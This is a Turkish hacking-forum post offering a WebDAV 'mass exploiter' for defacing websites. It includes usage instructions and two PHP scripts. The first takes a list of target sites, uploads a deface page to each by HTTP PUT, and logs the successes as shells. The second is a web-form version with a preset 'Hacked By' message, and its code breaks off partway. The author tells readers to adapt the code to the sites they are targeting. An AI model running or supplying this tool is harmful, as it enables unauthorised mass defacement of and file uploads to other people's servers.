WebDav Auto Exploiter PHP Python Code

1. Yazar => KingSkrupellos - Cyberizm.Org Digital Security Team
2.  
3. [img]https://i.hizliresim.com/JljQbE.png[/img]
4.  
5. Kullanımı => Xampp Yüklü Olması Gerekiyor.
6.  
7. Başlat + Çalıştır + cmd.exe yada Command Prompt üzerinden
8.  
9. php webdav_me.php list.htm file_deface.htm
10.  
11. Lütfen Kodları ve Siteleri Dosya İsimlerini kendinize göre yani Hedeflediğiniz Siteleri Göre Düzenleyiniz :D :cigara:
12.  
13. Başlık => WebDav Internet Information Services IIS PHP Python Auto Exploiter PHP Python Codes
14.  
15. Web-based Distributed Authoring and Versioning => WebDav'ın Açılımı
16.  
17. WebDaV Açıklı Siteleri Tarar ve Aynı Zamanda Shell Atmanıza Kadar Yolu Vardır.
18.  
19. Desteklenen Dosya Formatları => .txt .html .php
20.  
21. Kullanım Videosu =>
22.  
23. [video=youtube]https://www.youtube.com/watch?v=98SPhCj88zE[/video]
24.  
25. [video=youtube]https://www.youtube.com/watch?v=LXmfzEVM0mM[/video]
26.  
27. Ayrıca VisualBasic + C++ ile yazılmış Programı Dahi var :D
28.  
29. [code]https://nmap.org/nsedoc/scripts/http-webdav-scan.html[/code]
30.  
31. EasyWebDav Exploiter Python Kodu =>
32.  
33. [code]https://github.com/amnong/easywebdav[/code]
34.  
35. WebDav Auto Exploiter PHP Code
36.  
37. [hide][code]<?php
38. # KingSkrupellos
39. # Cyberizm Digital Security Team
40. # cyberizm.org
41.  
42. if(!is_file($argv[1]) || !is_file($argv[2])){
43. echo "\n\nUsage: php $argv[0] list.htm file_deface.htm\n\n";
44. }else{
45. $sites = $argv[1];
46. $file = $argv[2];
47. $fp = fopen($file, "r");
48. $buka=fopen("$sites","r");
49. $filesize = filesize($file);
50. $size=filesize("$sites");
51. $baca=fread($buka,$size);
52. $sites = explode("<br>", $baca);
53. foreach($sites as $site){
54. if(preg_match("#http://#", $site)) {
55. $site = $site;
56. } else {
57. $site = "http://".$site;
58. }
59. $site = "$site/$file";
60. $ch = curl_init();
61. curl_setopt($ch, CURLOPT_URL, $site);
62. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
63. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
64. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0");
65. curl_setopt($ch, CURLOPT_PUT, true);
66. curl_setopt($ch, CURLOPT_INFILE, $fp);
67. curl_setopt($ch, CURLOPT_INFILESIZE, $filesize);
68. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
69. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
70. $exec = curl_exec($ch);
71. echo "$site -> ";
72. $su = curill($site);
73. if(preg_match("/hacked/i", $su)) {
74. echo "Created Successfully\n\n";
75. file_put_contents("webdav_shell.htm", "$site<br>", FILE_APPEND);
76. } else {
77. echo "Failed\n";
78. }
79. }
80. }
81. function curill($site){
82. $ch = curl_init ("$site");
83. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
84. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
85. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
86. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
87. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
88. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
89. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
90. $data3 = curl_exec ($ch);
91. return $data3;
92. }
93. ?>[/code][/hide]
94.  
95. ____________________________________________
96.  
97. WebDav Internet Information Services IIS PHP Python Auto Exploiter PHP İkinci Otomatik Exploiter Code
98.  
99. Webdav Exploiter Web Second Version - Cyberizm Digital Security Team
100.  
101. [hide][code]<?php
102. # KingSkrupellos
103. # Cyberizm.Org Digital Security Army
104. # web version
105. ?>
106. <head><title>WebDAV Mass Exploiter</title></head>
107. <style>
108. body { font-family: Atma }
109. input, textarea { font-family: Atma }
110. th { background:black;color:#fff;padding:3px;font-family: Suez One}
111. </style>
112. <link href='http://fonts.googleapis.com/css?family=Atma' rel='stylesheet' type='text/css'/>
113. <link href='http://fonts.googleapis.com/css?family=Suez+One' rel='stylesheet' type='text/css'/>
114. <center>
115. <table><tr><th>WebDAV Exploiter IndoXploit</th></tr> <tr><td><form action="" method="POST">
116. <textarea name="isi" style="height:100px;width:500px"></textarea><br><br>
117. <textarea name="isi1" style="height:100px;width:500px">Hacked By KingSkrupellos Cyberizm.Org Digital Security Team</textarea><br><br>
118. <input type="hidden" name="site" value="list.txt">
119. <input type="hidden" name="file" value="x.htm">
120. <center><input type="submit" style="background:black;color:#fff;padding:3px;border:0" name="go" value="&lt;&lt; Execute &gt;&gt;"></center>
121. </form>
122. </td></tr></table>
123. <table> <tr><th>Result Deface</th></tr> <tr><td>
124. <div style="border:1px solid black;border-bottom:5px solid black; padding:3px;height:auto;width:500px">
125. <?php
126.  
127. if($_POST['go']){
128.  
129. $nama = "x.htm";
130. $isi = $_POST['isi1'];
131. $fp = fopen($nama,"w");
132. fputs($fp, $isi);
133.  
134. $nama = "list.txt";
135. $isi = $_POST['isi'];
136. $fp = fopen($nama,"w");
137. fputs($fp, $isi);[/code][/hide]
138.  
139. ### Makalenin Sonuna Gelmiş Bulunmaktayız. Bilginin Tadını Çıkartın. ###
140.  
141. ### KingSkrupellos - Cyberizm.Org Digital Security Team ####